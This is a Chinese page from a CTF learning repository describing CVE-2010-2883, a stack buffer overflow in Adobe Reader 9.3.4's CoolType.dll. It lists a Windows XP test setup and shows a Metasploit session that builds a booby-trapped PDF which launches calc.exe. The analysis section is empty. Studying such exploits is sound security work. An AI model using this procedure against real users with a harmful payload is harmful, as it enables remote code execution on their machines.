CTF-All-In-One/doc/7.1.8_adobe_reader_2010-2883.md
2018-05-18 16:23:54 +08:00

1.8 KiB
Raw Blame History

7.1.8 [CVE-2010-2883] Adobe Reader 9.3.4 Stack Buffer Overflow

下载文件

漏洞描述

Adobe Reader 和 Acrobat 9.4 之前版本的 CoolType.dll 中存在基于栈的缓冲区溢出漏洞。远程攻击者可借助带有 TTF 字体的 Smart INdependent Glyphlets (SING) 表格中超长字段的 PDF 文件执行任意代码或者导致拒绝服务。

漏洞复现

推荐使用的环境 备注
操作系统 Windows XP SP3 体系结构32 位
调试器 WinDbg 版本号10.0 x86
漏洞软件 Adobe Reader 版本号9.3.4

我们利用 Metasploit 来生成攻击样本:

msf > search cve-2010-2883
   Name                                            Disclosure Date  Rank   Description
   ----                                            ---------------  ----   -----------
   exploit/windows/fileformat/adobe_cooltype_sing  2010-09-07       great  Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow

msf > use exploit/windows/fileformat/adobe_cooltype_sing

msf exploit(windows/fileformat/adobe_cooltype_sing) > set payload windows/exec 
payload => windows/exec

msf exploit(windows/fileformat/adobe_cooltype_sing) > set cmd calc.exe
cmd => calc.exe

msf exploit(windows/fileformat/adobe_cooltype_sing) > set filename cve20102883.pdf
filename => cve20102883.pdf

msf exploit(windows/fileformat/adobe_cooltype_sing) > exploit 
[*] Creating 'cve20102883.pdf' file...
[+] cve20102883.pdf stored at /home/firmy/.msf4/local/cve20102883.pdf

使用漏洞版本的 Adobe Reader 打开样本,即可弹出计算器:

漏洞分析

参考资料